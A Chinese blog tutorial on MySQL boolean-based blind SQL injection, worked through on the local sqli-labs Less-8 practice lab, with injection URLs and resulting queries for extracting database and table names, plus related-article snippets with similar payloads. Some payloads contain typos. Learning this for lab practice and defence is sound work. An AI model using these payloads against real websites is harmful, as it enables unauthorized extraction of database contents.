渗透(五)之MySQL的布尔注入

最新推荐文章于 2024-02-20 17:52:23 发布
最新推荐文章于 2024-02-20 17:52:23 发布
阅读量850 收藏 4
点赞数
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32719221/article/details/100782503
版权

SQL盲注–bool注入

布尔盲注的原理

在这里插入图片描述
后端不往前端返回具体的数据库的值,通过页面显示正常与否,判断SQL注入的值是否为真。

布尔盲注方法:

在这里插入图片描述

针对sqli-labs/less-8

一开始:

当url为
127.0.0.1/less-8/?id=1
对应的SQL语句
SELECT * FROM users WHERE id = ‘1’ LIMIT 0,1

先测试系统有无SQL注入漏洞

当url为
127.0.0.1/less-8/?id=1’
结果:
发现页面正常情况下You are in…
加上’之后You are in 不在了
对应的SQL语句为
SELECT * FROM users WHERE id = ‘1’’ LIMIT 0,1

127.0.0.1/less-8/?id=1’and ‘1’='1
SELECT * FROM users WHERE id = '1’and ‘1’=‘1’ LIMIT 0,1
发现页面返回正常仍然是 You are in…

127.0.0.1/less-8/?id=1’ and ‘1’='2
SELECT * FROM users WHERE id = ‘id=1’ and ‘1’=‘2’ LIMIT 0,1
页面返回不正常,看不到 You are in…

所以判断网页是存在SQL注入漏洞的

源码分析:

在这里插入图片描述
没有报错注入,代码的正确回显并没有返回数据库的内容,只能根据页面是否返回条件,判断SQL语句是否正确。

进行布尔盲注

使用left

127.0.0.1/less-8/id=1’ and left((select database()),1)=‘s’–+
SELECT * FROM users WHERE id = ‘1’ and left((select database()),1)=‘s’–+’ LIMIT 0,1
判断当前库的首字母是不是’s’
返回You are in …
说明当前数据库首字母是’s’

查当前库中,第一个库中第一个表的第一个首字母
构造url方法:
127.0.0.1/less-8/id=1’ and left((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1)=‘e’–+
SELECT * FROM users WHERE id = ‘1’ and left((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1)=‘e’–+’ LIMIT 0,1
借助bp方法:
使用bp的Intruder模块进行一个盲注,快速循环表名的每个字母

同样的方法结合bp,判断数据库里有哪些列。

实现对数据库信息的获取

使用regix

查询当前库名,正则表达第一位是以s开头
127.0.0.1/less-8/?id=1’ and (select database()) regexp ‘^s’ --+
SELECT * FROM users WHERE id = ‘1’ and (select database()) regexp ‘^s’ --+’ LIMIT 0,1
页面返回 You are in…表示数据库的首字母确实为s

如果对数据库中的表进行查询
127.0.0.1/less-8/?id=1’ and select table_name from information_schema.tables where table_schema=database() limit 0,1) regexp ‘^s’ --+
结合bp快速判断

使用like

判断当前数据库中以e开头的表
127.0.0.1/less-8/?id=1’ and select table_name from information_schema.tables where table_schema=database() limit 0,1) like ‘e%’–+

substr+ascii

127.0.0.1/less-8/?id=1’ and ascli(substr(seletc database(),1,1))=98–+

菜菜的程序猿
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web安全:SQL注入布尔盲注原理+步骤+实战操作
wangyuxiang946的博客
05-13 2093
这篇文章为大家解析布尔盲注实现原理,结合实战案例讲解布尔盲注使用步骤
webug-布尔注入
我只会装360的博客
09-17 859
布尔注入是盲注之一,进行sql语句注入后,选择的数据并不能返回到前端。只能利用其他方法来判断,还是简单介绍下学到的知识点。 left(database(),n)    database() 数据库名称 left()函数表示截取数据库左侧n个字符 substr(a,b,c)      从字符串a的b位置开始截取c个字符,当b为负数时截取位置是从字符串a右端向左数b个字符 mid(a,b,c) ...
SQL注入bool注入
studyphp123的博客
04-18 1231
一、预备知识 二、实验目的 三、实验工具 浏览器 四、实验环境 客户机一台 、实验步骤 第一步:访问 http://www.any.com/sqli/Less-8/?id=1 页面正常: 第二步:加入单引号,访问 http://www.any.com/sqli/Less-8/?id=1' 不会报错,但是页面不正常,可以判断是bool型注入: 第三步:判断列数(通过二分法) 1)输入:...
mysql bool型注入,SQL注入【七】——Boolean注入
weixin_39862097的博客
03-23 380
基本注入流程有些人以为布尔盲注就是页面或者返回结果数据包中带有yes或者no,其实这种说法不正确0x01 判断注入点类型数字型字符型如果是字符型还得通过闭合,具体可以查看我之前的文章数字型和字符型0x02 获取数据库库名1. 判断当前数据库库名长度length():判断字符长度利用and length(database())不断去构造条件,如:and length(database())>1...
MYSQL布尔注入
ZccAc的博客
09-16 418
MYSQL布尔注入 原理为利用mid()获取字符,利用ord()将字符转为ASCII码,利用>、<和=来确定字符的范围。 获取数据库名长度 http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1>2 or length(database())=8# 获取数据库名 http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1>2 or ord(mid(database(),1,1))=115.
web渗透—— 基于布尔类型的盲注
王嘟嘟的博客
04-16 1348
0x00 前言 之前学习了。 0x01 知识点 1.盲注的基本实现 ascii(substr(database(),1,1))&gt;100 2.盲注获取表 select table_name from information_schema.tables where table_schema=database() limit 0,1 3.盲注列名 select colu...
PHP+MYSQL 注入靶场
最新发布
04-26
里面有相关源码,参照源码去理解漏洞会更深刻,靶场中有SQL字符型注入,SQL盲注,提供给大家进行练习使用。
MySQL注入攻击与防御
02-25
like,mod(),...)字符串的猜解操作(mid(),left(),rpad(),…)字符串生成操作(0x61,hex(),conv()(使用conv([10-36],10,36)可以实现所有字符的表示))可以用以下语句对一个可能的注入点进行测试以下是Mysql中可以用到的...
MySQL种报错注入1
08-04
MySQL种报错注入是一种利用数据库的错误反馈信息来获取敏感数据的技术,通常在网站存在SQL注入漏洞时被攻击者利用。以下将详细介绍这些方法: 1. **数据库版本暴露** 利用`information_schema.tables`系统表和`...
mysql5 注入漏洞
10-30
mysql5注入漏洞代码
JDBC对MySQL数据库布尔字段的操作方法
09-03
本篇文章将深入探讨如何使用JDBC来操作MySQL数据库中的布尔字段,特别是在处理BIT(1)类型的布尔字段时需要注意的细节。 首先,MySQL数据库中的布尔类型通常表示为BIT(1),这是因为MySQL并没有原生的BOOLEAN或BOOL...
Boolean注入攻击
天天学安全专属博客
11-06 841
Boolean注入攻击,在线靶场SQL注入漏洞测试(布尔盲注)解题,详细的Boolean注入语句
MySQL注入笔记
T-bag的博客
04-18 783
MySQL注入笔记 MySQL基础知识information_schema //MySQL自带数据表 table_schema //数据库名 table_name //表名 column_name //列名 select table_name information_schema.tables where table_schema=database(); //跑表名 select column_n
SQL注入布尔式(boolean)注入
2301_79299101的博客
09-22 331
输入1' and if(substring(database(),1,1)='d',1,0)--+输入1'and if(length(database())=4,1,0) #其他的表名和列都用同样的方法 ,其他信息也是一样。输入 vince'and'1'='1。再输入 vince'and'1'='2。2,判断是数字式还是字符型。3,判断数据库有多少个字段。
布尔类型的SQL盲注注入
m0_64368365的博客
02-20 1311
布尔盲注适用于无回显的情况,只有通过true或false及页面是否正常来判断所输入内容是否正确。
mysql 布尔型盲注,SQL注入布尔注入(MySQL)
weixin_34138192的博客
03-17 341
0x00 特点当页面存在注入,但是没有显示位,且没有用echo "mysql_error()"输出错误信息时可以用,它一次只能猜测一个字节,速度慢,但是只要存在注入就能用0x01 利用方式用and连接前后语句:www.xxx.com/aa.php?id=1 and (注入语句) --+根据返回页面是否相同来得到数据0x02 注入步骤找到注入点,判断闭合字符尝试猜解列数,得到显示位得到数据库名最终得...
MySQL基于布尔型盲注常用语句
专注企业信息安全-sec
10-04 2410
什么是盲注? 基于布尔型SQL盲注即在SQL注入过程中,应用程序仅仅返回True(页面)和False(页面)。 这时,我们无法根据应用程序的返回页面得到我们需要的数据库信息。但是可以通过构造逻辑判断(比较大小)来得到我们需要的信息。 常用语句汇总 查询所有数据库 1.判断表存不存在   1   and exists(select ...
浅谈盲注中的基于时间型和布尔型的注入方法
热门推荐
pygain的博客
11-08 2万+
SQL显错注入已经被用烂了像这种漏洞,漏洞批量发现工具找一找,sqlmap跑一跑。 今天讲的是在我们的命令被带入数据库查询语句但是却什么都没有返回的情况我们该怎么办。例如应用程序就会返回一个“通用的”的页面,或者重定向一个通用页面(可能为网站首页)。这时,我们之前学习的SQL注入办法就无法使用了。 盲注,即在SQL注入过程中,SQL语句执行选择后,选择的数据不能回显到前端,我们需要使用一些特殊的方法进行判断或尝试,这个过程称为盲注
⑥基于布尔型SQL盲注
熊俊坤的博客
10-28 5012
基于布尔型SQL盲注
mysql 布尔类型
07-28
MySQL中的布尔类型实际上是使用tinyint(1)来代替的。在MySQL官方文档中指出,目前不支持直接使用boolean类型,而是使用tinyint(1)来表示布尔类型。如果你定义了布尔类型,MySQL会自动将其转换为tinyint(1)。在MySQL...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值